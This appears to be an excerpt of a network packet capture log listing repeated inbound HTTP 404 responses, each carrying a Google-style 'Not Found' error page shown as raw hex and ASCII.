Dec 1, 2024 22:52:06.424324989 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.424532890 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.525043964 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.525140047 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.625586033 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.625592947 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.726164103 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.726267099 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.826710939 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.826734066 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.927237988 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.927292109 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:07.027673006 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:07.027853966 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:07.128211021 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:07.228662014 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
